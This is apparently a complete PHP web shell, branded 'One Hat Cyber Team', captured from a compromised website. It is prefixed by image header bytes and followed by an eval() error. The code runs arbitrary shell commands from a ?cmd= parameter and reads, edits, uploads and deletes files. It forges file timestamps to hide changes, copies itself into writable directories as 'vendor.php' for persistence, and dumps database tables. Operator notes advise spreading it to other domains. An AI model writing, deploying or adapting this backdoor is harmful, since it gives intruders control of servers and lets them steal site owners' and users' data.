�����JFIF��H�H�����C�   %# , #&')*)-0-(0%()(��� �P�P�������������������5� �������!1AQq��"#2Bar���R�Sc��������?��R��������X�o�k,��e�k�X���9["&Q ����}Nq'����{u\�6hc�i�r_�n[t�lU�;8��Ax����r�{�f����Q��岳���/f�8�T�D'e����W ^�YŞ��}h����7�`��Կ�֑�w.gVtq>��5����O���y�.>%X��U]3�\���${�أh�~k�Բ�o�Fq��#����y����0�&��;�-W�*�%K� ��m'o�Yt��L�����Q��TS1�%�`y=���+���b����dmi�HC�T_#���|���P��㬈v;?E����U�" W<����ms��MmL��G1�9��'�'�����%��akJo]Qcr��խ���O$ ;:V�>�_Dn����s����m۸U�#�ҝ��ܾpe.qw3�/��*�a#���=\.!N���s��l��x�Ԗjz�Z�!��� �>!��Ɵs��E<��9�N9m�/��E�&�y�? ��yY$a�p�-�R�5��6�XOk$>D�켎��T�RUT�����<���>��h��<�9��D���}�?f8��$� �EYki/O����28��}#������"(��9���<� � x�G���Ԑ���YD�2��DL���
Warning: chmod(): No such file or directory in /home/publqaio/barnesandnoblespublisher.com/css/990.php(42) : eval()'d code on line 1
Default page
One Hat Cyber Team
  • Dir : ~/home/publqaio/onlinevinchecker.com/
    • Edit File: 67.php

    '; echo $output . '
    '; exit; } } } $output .= '

    File: ' . htmlspecialchars($ajax_file) . '

    '; $content = ''; $handle = fopen($ajax_file, 'rb'); if ($handle) { while (!feof($handle)) $content .= fread($handle, 16384); fclose($handle); } else $content = 'Open failed: ' . error_get_last()['message']; if (empty($content)) { $output .= '

    Empty file or read error.

    '; echo $output . ''; exit; } $ext = strtolower(pathinfo($ajax_file, PATHINFO_EXTENSION)); $mime_type = function_exists('mime_content_type') ? mime_content_type($ajax_file) : (in_array($ext, ['jpg','png','gif']) ? 'image/' . $ext : (in_array($ext, ['txt','php','js','html','json','xml']) ? 'text/plain' : 'application/octet-stream')); if (strpos($mime_type, 'image/') === 0 && strlen($content) < 10*1024*1024) { $output .= 'Preview'; } elseif (in_array($mime_type, ['text/plain', 'application/json', 'application/xml', 'application/x-httpd-php']) || strpos($mime_type, 'text/') === 0) { $output .= ''; } else { $hex_dump = ''; for ($i = 0; $i < min(1024*10, strlen($content)); $i += 16) { $line = substr($content, $i, 16); $hex_dump .= str_pad(bin2hex($line), 32, '0', STR_PAD_RIGHT) . ' | ' . htmlspecialchars(substr($line, 0, 16)) . "\n"; } $output .= '

    Binary: Download

    '; } if (strpos($ajax_file, 'view_sym_') !== false || strpos($ajax_file, 'readable_') !== false) { unlink($ajax_file); } } echo $output . ''; exit; } if (isset($_POST['ajax_edit_file'])) { $ajax_file = realpath($_POST['ajax_edit_file']); $output = '
    Xâ†â†’'; $bypass = bypass_htaccess('read', $ajax_file); if ($bypass['success'] && file_exists($ajax_file) && is_readable($ajax_file)) { $mime_type = mime_content_type($ajax_file); $output .= '

    Editing: ' . htmlspecialchars($ajax_file) . '

    ' . htmlspecialchars($bypass['msg']) . '

    '; if (strpos($mime_type, 'text/') === 0 || in_array($mime_type, ['application/json', 'application/xml', 'application/x-httpd-php']) || $mime_type === 'application/x-empty') { $output .= '
    '; } else { $output .= '

    Unsupported file type for editing: ' . htmlspecialchars($mime_type) . '

    '; } } else { if (file_exists($ajax_file) && is_readable($ajax_file)) { $mime_type = mime_content_type($ajax_file); $output .= '

    Editing: ' . htmlspecialchars($ajax_file) . '

    '; if (strpos($mime_type, 'text/') === 0 || in_array($mime_type, ['application/json', 'application/xml', 'application/x-httpd-php']) || $mime_type === 'application/x-empty') { $output .= '

    '; } else { $output .= '

    Unsupported file type for editing: ' . htmlspecialchars($mime_type) . '

    '; } } else { $output .= '

    Cannot open file: Permission denied' . ($bypass['msg'] ? ' - ' . htmlspecialchars($bypass['msg']) : '') . '

    '; } } echo $output . '
    '; exit; } if (isset($_POST['ajax_save_file'])) { $file = realpath($_POST['ajax_save_file']); $content = $_POST['content'] ?? ''; if ($file && file_exists($file)) { $bypass = bypass_htaccess('write', $file, $content); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (is_writable($file)) { if (@file_put_contents($file, $content) !== false) { echo '

    File saved: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to save file: ' . htmlspecialchars($file) . '

    '; } } else { shell_exec_alternative('chmod 777 ' . escapeshellarg($file), true); if (is_writable($file) && @file_put_contents($file, $content) !== false) { echo '

    File saved after chmod: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to save file: Permission denied - ' . htmlspecialchars($bypass['msg']) . '

    '; } } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_create_file'])) { $dir = realpath($_POST['current_dir']); $new_file_name = basename($_POST['new_file_name']); $new_file_content = $_POST['new_file_content'] ?? ''; if ($dir && is_dir($dir) && is_writable($dir)) { $new_file_path = $dir . '/' . $new_file_name; $is_ht = ($new_file_name === '.htaccess'); if ($is_ht) { $bypass = bypass_htaccess('write', $new_file_path, $new_file_content); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } else { echo '

    Failed to create .htaccess: ' . htmlspecialchars($bypass['msg']) . '

    '; exit; } } else { if (@file_put_contents($new_file_path, $new_file_content) !== false) { shell_exec_alternative('chmod 644 ' . escapeshellarg($new_file_path), true); $files = []; $mtimes = []; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { $file_path = $dir . '/' . $file; if ($file_path !== $new_file_path && is_file($file_path) && ($mtime = @filemtime($file_path)) !== false) { $files[] = $file_path; $mtimes[] = $mtime; } } closedir($dh); } if (!empty($mtimes)) { $mtime_counts = array_count_values($mtimes); arsort($mtime_counts); $target_mtime = count($mtime_counts) === count($mtimes) ? min($mtimes) : key($mtime_counts); } else { $target_mtime = strtotime(sprintf('%d-%02d-%02d %02d:%02d:00', date('Y') - 1, mt_rand(1, 12), mt_rand(1, 28), mt_rand(0, 23), mt_rand(0, 59))); } if ($target_mtime) { shell_exec_alternative('touch -t ' . escapeshellarg(date('YmdHi', $target_mtime)) . ' ' . escapeshellarg($new_file_path), true); } echo '

    File created: ' . htmlspecialchars($new_file_path) . '

    '; } else { echo '

    Failed to create file: ' . htmlspecialchars($new_file_path) . '

    '; } } } else { echo '

    Current directory is not writable or invalid: ' . htmlspecialchars($dir) . '

    '; } exit; } if (isset($_POST['ajax_delete_file'])) { $file = realpath($_POST['ajax_delete_file']); if ($file && file_exists($file)) { $bypass = bypass_htaccess('delete', $file); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (unlink($file)) { echo '

    File deleted: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to delete file: ' . htmlspecialchars($file) . ' - ' . htmlspecialchars($bypass['msg']) . '

    '; } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_rename_file'])) { $file = realpath($_POST['ajax_rename_file']); $new_name = basename($_POST['new_name']); if ($file && file_exists($file)) { $new_path = dirname($file) . '/' . $new_name; $bypass = bypass_htaccess('rename', $file, null, $new_name); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (rename($file, $new_path)) { echo '

    File renamed to: ' . htmlspecialchars($new_path) . '

    '; } else { echo '

    Failed to rename file - ' . htmlspecialchars($bypass['msg']) . '

    '; } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_scandir'])) { $dir = realpath($_POST['ajax_scandir']); ob_start(); scandire($dir); $table_content = ob_get_clean(); echo $table_content; exit; } if (isset($_POST['action'], $_POST['file']) && $_POST['action'] === 'chmod') { $file = realpath($_POST['file']); if ($file && file_exists($file)) { shell_exec_alternative('chmod 777 ' . escapeshellarg($file), true); echo '

    Permissions changed for ' . htmlspecialchars($file) . ': ' . perms($file) . '

    '; } else { echo '

    Invalid file for chmod

    '; } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if (isset($_POST['action'], $_POST['target_dir']) && $_POST['action'] === 'copy_shell') { $target_dir = realpath($_POST['target_dir']); if ($target_dir && is_dir($target_dir) && is_writable($target_dir)) { $new_shell_path = rtrim($target_dir, '/') . '/vendor.php'; if (copy(__FILE__, $new_shell_path)) { $_SESSION['dir'] = $target_dir; echo '

    Shell copied to: ' . htmlspecialchars($new_shell_path) . '

    1.Save to Notepad++

    3. Do zneakysnip2.p

    '; if (is_ajax()) { echo ''; ob_end_flush(); exit; } echo ''; } else { echo '

    Failed to cop to ' . htmlspecialchars($new_shell_path) . '

    '; } } else { echo '

    Invalid or unwritable target directory: ' . htmlspecialchars($_POST['target_dir']) . '

    '; } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; } $login = 'katya'; $hashed_password = '$2a$12$zqpuA.tgRNaSxaGLhN316.tAgnii5uCkk0oJlraiX7Gie.qlkLXVG'; if (isset($_POST['action']) && $_POST['action'] === 'exit') { session_unset(); session_destroy(); } if (!isset($_SESSION['authenticated'])) { if (isset($_POST['login'], $_POST['password']) && $_POST['login'] === $login && password_verify($_POST['password'], $hashed_password)) { $_SESSION['authenticated'] = true; } else { $showInvalid = ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['action'])); echo $header . ($showInvalid ? '

    Invalid credentials.

    ' : '') . '
    Login:
    Password:
    ' . $footer; exit; } } // Raw ?cmd= unfiltered execution - direct pass, no sanitize if (isset($_REQUEST['cmd'])) { echo '
    ' . shell_exec_alternative_raw($_REQUEST['cmd']) . '
    '; exit; } $_SESSION['action'] = $_POST['action'] ?? $_SESSION['action'] ?? 'viewer'; $_SESSION['dir'] = $_POST['dir'] ?? $_SESSION['dir'] ?? getcwd(); $_SESSION['file'] = $_POST['file'] ?? $_SESSION['file'] ?? ''; $action = $_SESSION['action']; $dir = realpath($_SESSION['dir']); $file = $_SESSION['file'] ? realpath($_SESSION['file']) : ''; // Removed sanitize_command entirely - raw execution for full power function shell_exec_alternative($cmd, $allow_redirection = false) { if (empty($cmd)) return ''; // No sanitization - raw $cmd if (empty($cmd)) return 'Invalid command: Empty'; $functions = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open']; $available = false; foreach ($functions as $func) { if (function_exists($func)) { $available = true; break; } } if ($available) { if (function_exists('shell_exec')) { $output = shell_exec($cmd . ' 2>&1'); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output); $output = implode("\n", $output); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1'); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1'); $output = ob_get_clean(); } elseif (function_exists('popen')) { $handle = popen($cmd . ' 2>&1', 'r'); $output = ''; while (!feof($handle)) $output .= fread($handle, 8192); pclose($handle); } elseif (function_exists('proc_open')) { $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $process = proc_open($cmd, $descriptors, $pipes); $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } return htmlspecialchars($output ?? 'No output'); } $temp_script = sys_get_temp_dir() . '/cmd_' . uniqid() . '.sh'; file_put_contents($temp_script, "#!/bin/bash\n$cmd 2>&1"); @chmod($temp_script, 0755); $temp_php = sys_get_temp_dir() . '/run_' . uniqid() . '.php'; file_put_contents($temp_php, ''); $ch = curl_init('http://' . $_SERVER['HTTP_HOST'] . '/' . basename($temp_php)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); @unlink($temp_script); @unlink($temp_php); return htmlspecialchars($output ?: 'Command execution failed: All execution functions disabled and fallback unsuccessful'); } // Raw variant for ?cmd= - no htmlspecialchars output either for binary/piping function shell_exec_alternative_raw($cmd) { if (empty($cmd)) return ''; $functions = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open']; $available = false; foreach ($functions as $func) { if (function_exists($func)) { $available = true; break; } } if ($available) { if (function_exists('shell_exec')) { return shell_exec($cmd . ' 2>&1'); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output); return implode("\n", $output); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1'); return ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1'); return ob_get_clean(); } elseif (function_exists('popen')) { $handle = popen($cmd . ' 2>&1', 'r'); $output = ''; while (!feof($handle)) $output .= fread($handle, 8192); pclose($handle); return $output; } elseif (function_exists('proc_open')) { $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $process = proc_open($cmd, $descriptors, $pipes); $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); return $output; } return 'No output'; } $temp_script = sys_get_temp_dir() . '/cmd_' . uniqid() . '.sh'; file_put_contents($temp_script, "#!/bin/bash\n$cmd 2>&1"); @chmod($temp_script, 0755); $temp_php = sys_get_temp_dir() . '/run_' . uniqid() . '.php'; file_put_contents($temp_php, ''); $ch = curl_init('http://' . $_SERVER['HTTP_HOST'] . '/' . basename($temp_php)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); @unlink($temp_script); @unlink($temp_php); return $output ?: 'Command execution failed'; } function format_size($bytes) { if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . 'GB'; if ($bytes >= 1048576) return round($bytes / 1048576, 2) . 'MB'; if ($bytes >= 1024) return round($bytes / 1024, 2) . 'KB'; return $bytes . 'B'; } if ($action === 'download' && $file && file_exists($file)) { $bypass = bypass_htaccess('download', $file); if ($bypass['success']) exit; // Handled in bypass if (is_dir($file)) { $zipname = basename($file) . '.zip'; $temp_zip = sys_get_temp_dir() . '/' . $zipname; $zip = new ZipArchive(); if ($zip->open($temp_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($file, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { $relative_path = substr($item->getPathname(), strlen($file) + 1); if ($item->isDir()) $zip->addEmptyDir($relative_path); else $zip->addFile($item->getPathname(), $relative_path); } $zip->close(); header('Content-Length: ' . filesize($temp_zip)); header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . $zipname . '"'); header('Content-Transfer-Encoding: binary'); readfile($temp_zip); unlink($temp_zip); exit; } else { echo 'Failed to create ZIP'; exit; } } else { header('Content-Length: ' . filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Transfer-Encoding: binary'); readfile($file); exit; } } if ($action === 'upload' && isset($_FILES['upload_file'])) { $upload_name = basename($_FILES['upload_file']['name']); $upload_path = $dir . '/' . $upload_name; $tmp_path = $_FILES['upload_file']['tmp_name']; $error_code = $_FILES['upload_file']['error']; error_log("UPLOAD: Name=$upload_name, Error=$error_code, DirWrit=$dir|" . (is_writable($dir) ? 'Y' : 'N') . ", TmpExists=" . (file_exists($tmp_path) ? 'Y' : 'N'), 3, sys_get_temp_dir() . '/shell.log'); if ($error_code !== UPLOAD_ERR_OK) { echo '

    Upload error ' . $error_code . ': ' . ($error_code == 1 ? 'File too large (check php.ini upload_max_filesize)' : 'Server reject') . '

    '; echo '
    '; if (is_ajax()) { ob_end_flush(); exit; } } elseif (!is_writable($dir)) { $chmod_out = shell_exec_alternative('chmod 777 ' . escapeshellarg($dir) . ' 2>&1 || sudo chmod 777 ' . escapeshellarg($dir) . ' 2>&1', true); error_log("CHMOD DIR: $chmod_out", 3, sys_get_temp_dir() . '/shell.log'); if (!is_writable($dir)) { echo '

    Dir not writable post-chmod: ' . htmlspecialchars($chmod_out) . '. Pivot to /tmp copy.

    '; $upload_path = sys_get_temp_dir() . '/' . $upload_name; } } if (move_uploaded_file($tmp_path, $upload_path)) { shell_exec_alternative('chmod 644 ' . escapeshellarg($upload_path), true); echo '

    File uploaded: ' . htmlspecialchars($upload_path) . '

    '; } else { if (($handle = fopen($tmp_path, 'rb')) !== false) { $content = ''; while (!feof($handle)) $content .= fread($handle, 8192); fclose($handle); if (file_put_contents($upload_path, $content) !== false) { echo '

    Uploaded via stream fallback: ' . htmlspecialchars($upload_path) . '

    '; } else { echo '

    Stream fallback failed - disk full or quota hit.

    '; } } else { echo '

    Cannot access tmp file - check open_basedir or SELinux.

    '; } } if (pathinfo($upload_path, PATHINFO_EXTENSION) === 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($upload_path) === TRUE) { $zip->extractTo($dir); $zip->close(); unlink($upload_path); echo '

    ZIP extracted to ' . htmlspecialchars($dir) . ' - check for .php drops.

    '; shell_exec_alternative('find ' . escapeshellarg($dir) . ' -name "*.php" -exec chmod 644 {} + 2>/dev/null', true); } else { echo '

    ZIP corrupt or extract denied (perms/ACL).

    '; } } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if ($action === 'eval_upload' && isset($_POST['payload_b64'])) { $decoded = base64_decode($_POST['payload_b64']); if ($decoded !== false && is_writable($dir)) { $evil_path = $dir . '/tmp_eval_' . uniqid() . '.php'; file_put_contents($evil_path, ''); echo '

    Eval payload dropped: ' . htmlspecialchars($evil_path) . '. Delete after use.

    '; } else { echo '

    Eval failed - decode error or dir unwritable.

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'hide_shell') { $cmd = 'find / -type d -writable 2>/dev/null | awk \'{print length($0), $0}\' | sort -nr | cut -d\' \' -f2-'; $writable_dirs = array_filter(explode("\n", trim(shell_exec_alternative($cmd, true)))); $top_three = array_slice($writable_dirs, 0, 3); $script_name = basename(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)) ?: basename(__FILE__); $hidden = false; foreach ($top_three as $target_dir) { if (is_writable($target_dir)) { $shell_path = rtrim($target_dir, '/') . '/vendor.php'; if (copy(__FILE__, $shell_path)) { echo '

    Shell hidden at: ' . htmlspecialchars($shell_path) . '
    1. Save to Notepad++ so you won\'t lose it
    2. Delete previou and also upload to other domains incase this one goes down

    3. Do SNIPPET2

    '; $hidden = true; break; } } } if (!$hidden) echo '

    Failed to hid in top 3 paths.

    '; if (is_ajax()) exit; $_SESSION['action'] = 'viewer'; } if (isset($_POST['ajax_edit_db_cell']) && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'], $_POST['col'], $_POST['pk_col'], $_POST['pk_value'], $_POST['new_value'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = mysqli_real_escape_string($conn, $_POST['table']); $col = mysqli_real_escape_string($conn, $_POST['col']); $pk_col = mysqli_real_escape_string($conn, $_POST['pk_col']); $pk_value = $_POST['pk_value']; $new_value = $_POST['new_value']; $stmt = mysqli_prepare($conn, "UPDATE `$table` SET `$col` = ? WHERE `$pk_col` = ?"); mysqli_stmt_bind_param($stmt, "ss", $new_value, $pk_value); if (mysqli_stmt_execute($stmt)) { echo '

    Cell updated: ' . htmlspecialchars($col) . ' = ' . htmlspecialchars($new_value) . '

    '; } else { echo '

    Update failed: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_stmt_close($stmt); mysqli_close($conn); } else { echo '

    DB connect failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } exit; } if ($action === 'download_table_csv' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = mysqli_real_escape_string($conn, $_POST['table']); $result = mysqli_query($conn, "SELECT * FROM `$table`"); if ($result) { header('Content-Type: text/csv'); header('Content-Disposition: attachment; filename="' . $table . '.csv"'); $out = fopen('php://output', 'w'); $fields = mysqli_fetch_fields($result); $headers = array_column($fields, 'name'); fputcsv($out, $headers); while ($row = mysqli_fetch_assoc($result)) { fputcsv($out, $row); } fclose($out); mysqli_free_result($result); mysqli_close($conn); exit; } else { echo '

    Query failed: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    DB connect failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'conn_db' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { echo '

    Database connection successful

    '; mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'show_db_tables' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { if ($result = mysqli_query($conn, 'SHOW TABLES')) { echo '

    Database: ' . htmlspecialchars($_POST['db_name']) . '

    '; while ($row = mysqli_fetch_array($result)) { $table = $row[0]; $columns_result = mysqli_query($conn, "SHOW COLUMNS FROM `$table`"); $columns = []; while ($col = mysqli_fetch_array($columns_result)) $columns[] = htmlspecialchars($col['Field']); $row_count = mysqli_fetch_assoc(mysqli_query($conn, "SELECT COUNT(*) AS count FROM `$table`"))['count']; echo ''; } echo '
    TableColumnsRow Count
    		' . implode(', ', $columns) . '' . $row_count . '
    '; mysqli_free_result($result); } else { echo '

    Failed to fetch tables: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'show_table_rows' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = $_POST['table']; $count_result = mysqli_query($conn, "SELECT COUNT(*) AS total FROM `$table`"); $total_rows = mysqli_fetch_assoc($count_result)['total'] ?? 0; $limit = 100; $query = "SELECT * FROM `$table` LIMIT $limit"; if ($result = mysqli_query($conn, $query)) { echo '

    Table: ' . htmlspecialchars($table) . ' | Total Rows: ' . $total_rows . ' | Showing first ' . $limit . ' rows (click cells to edit; assumes col 1=PK)

    '; $fields = mysqli_fetch_fields($result); $pk_col = $fields[0]->name ?? 'id'; if (mysqli_num_rows($result) > 0) { echo ''; foreach ($fields as $f) { echo ''; } echo ''; $row_index = 0; while ($row = mysqli_fetch_assoc($result)) { echo ''; foreach ($fields as $f) { $col = $f->name; $value = $row[$col] ?? null; $display = $value === null ? 'NULL' : htmlspecialchars($value); $pk_value = $row[$pk_col] ?? ''; echo ''; } echo ''; $row_index++; } echo '
    ' . htmlspecialchars($f->name) . '
    ' . $display . '
    '; } else { echo '

    No rows found.

    '; } mysqli_free_result($result); echo '
    '; echo '
    '; echo ''; } else { echo '

    Failed to fetch rows: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } echo $header; ?>
    Shell Viewer (shell dir) Editor Conn DB EXIT


    '; // No escapeshellcmd - raw exec $_SESSION['action'] = 'viewer'; } function perms($file) { $perms = fileperms($file); $info = match (true) { ($perms & 0xC000) === 0xC000 => 's', ($perms & 0xA000) === 0xA000 => 'l', ($perms & 0x8000) === 0x8000 => '-', ($perms & 0x6000) === 0x6000 => 'b', ($perms & 0x4000) === 0x4000 => 'd', ($perms & 0x2000) === 0x2000 => 'c', ($perms & 0x1000) === 0x1000 => 'p', default => 'u' }; $info .= ($perms & 0x0100) ? 'r' : '-'; $info .= ($perms & 0x0080) ? 'w' : '-'; $info .= ($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'); $info .= ($perms & 0x0020) ? 'r' : '-'; $info .= ($perms & 0x0010) ? 'w' : '-'; $info .= ($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'); $info .= ($perms & 0x0004) ? 'r' : '-'; $info .= ($perms & 0x0002) ? 'w' : '-'; $info .= ($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'); return $info; } function view_size($size) { if ($size >= 1073741824) return round($size / 1073741824, 2) . ' GB'; if ($size >= 1048576) return round($size / 1048576, 2) . ' MB'; if ($size >= 1024) return round($size / 1024, 2) . ' KB'; return $size . ' B'; } function search_files($dir, $search_term) { $results = []; $home_dir = '/home/' . get_current_user(); $search_root = $home_dir; if (strpos(realpath($dir), realpath($home_dir)) === 0 || $dir === '/home' || $dir === '/') { $search_root = realpath($dir); } try { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($search_root, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); $self_path = realpath(__FILE__); foreach ($iterator as $file) { $file_path = $file->getPathname(); if ($file_path === $self_path) continue; if ($file->isFile() && is_readable($file) && ($content = @file_get_contents($file)) !== false) { foreach (explode("\n", $content) as $line_num => $line) { if (stripos($line, $search_term) !== false) { $results[] = ['file' => $file_path, 'line' => $line_num + 1, 'content' => htmlspecialchars(substr($line, 0, 100)) . (strlen($line) > 100 ? '...' : '')]; } } } } } catch (Exception $e) { return ['error' => 'Search error: ' . htmlspecialchars($e->getMessage())]; } return $results; } function scandire($dir) { $dir = realpath($dir); if (!$dir || !is_dir($dir)) return 'Invalid directory'; chdir($dir); $dirs = []; $files = []; if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if (filetype($dir . '/' . $file) === 'dir') $dirs[] = $file; if (filetype($dir . '/' . $file) === 'file') $files[] = $file; } closedir($dh); sort($dirs); sort($files); } $search_term = htmlspecialchars($_POST['search_term'] ?? '', ENT_QUOTES, 'UTF-8'); $search_term = trim($search_term); $search_results = $search_term ? search_files($dir, $search_term) : []; $home_dir = '/home/' . get_current_user(); $trash_dir = $home_dir . '/.local/share/Trash/files'; if (!is_dir($trash_dir)) $trash_dir = $home_dir . '/.trash'; echo ''; echo ''; echo ''; echo ''; echo '

    Search Results for "' . htmlspecialchars($search_term ?? '') . '"

    →â†X
    '; if ($search_results) { if (isset($search_results['error'])) echo '

    ' . $search_results['error'] . '

    '; elseif (empty($search_results)) echo '

    No results found for "' . htmlspecialchars($search_term) . '"

    '; else foreach ($search_results as $result) echo '

    File: ' . htmlspecialchars($result['file']) . '
    Line ' . $result['line'] . ': ' . $result['content'] . '

    '; } echo '
    '; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo ''; } echo ''; foreach ($dirs as $d) { $link = $dir . '/' . $d; $mtime = @filemtime($link); $last_modified = $mtime ? date('M j, Y, h:i A', $mtime) : 'Unknown'; echo ''; } foreach ($files as $f) { $linkfile = $dir . '/' . $f; $mtime = @filemtime($linkfile); $last_modified = $mtime ? date('M j, Y, h:i A', $mtime) : 'Unknown'; echo ''; } echo '
    Open dir:
    view file agan

    Hint: Can also use ?cmd=

    show

    Hint: \'Search\' searches from ' . htmlspecialchars($home_dir) . '

    uploading in .zip may bypass upload restrictions

    View Trash
    Show file:

    Hint: \'writable paths (current dir)\' works better than \'all writable paths\'


    Select drive:'; for ($j = ord('C'); $j <= ord('Z'); $j++) if (@opendir(chr($j) . ':/')) echo '' . chr($j) . ' '; echo '
    OS: ' . htmlspecialchars(php_uname()) . '
    Names  (click any to view)Last Modified
    		TypeSizePermissionOptions
    ' . htmlspecialchars($d) . '' . htmlspecialchars($last_modified) . '
    		dir' . perms($link) . 'Download ZIP
    ' . htmlspecialchars($f) . '' . htmlspecialchars($last_modified) . '
    		file' . view_size(filesize($linkfile)) . '' . perms($linkfile) . 'Download | Edit | Rename | Delete
    '; ?> Invalid file path: ' . htmlspecialchars($_POST['file']) . '

    '; $_SESSION['action'] = 'viewer'; exit; } echo '

    Use the "Edit" link in the file options to edit files via AJAX popup.

    '; $_SESSION['action'] = 'viewer'; exit; } if ($action === 'change_date' && isset($_POST['file'], $_POST['new_date'])) { $file = realpath($_POST['file']); $new_date = trim($_POST['new_date']); if (!$file || !file_exists($file)) { echo '

    Invalid file path: ' . htmlspecialchars($_POST['file']) . '

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } if (($date_time = DateTime::createFromFormat('M j, Y, h:i A', $new_date)) === false) { echo '

    Invalid date format. Use: Jun 14, 2025, 08:04 PM

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } $touch_format = $date_time->format('YmdHi'); if (!preg_match('/^\d{12}$/', $touch_format)) { echo '

    Invalid timestamp generated: ' . htmlspecialchars($touch_format) . '

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } $output = shell_exec_alternative('touch -t ' . $touch_format . ' ' . escapeshellarg($file), true); echo empty($output) || strpos($output, 'error') === false ? '

    Last modified date changed for ' . htmlspecialchars($file) . ' to ' . htmlspecialchars($new_date) . '

    ' : '

    Failed to change date for ' . htmlspecialchars($file) . ': ' . htmlspecialchars($output) . '

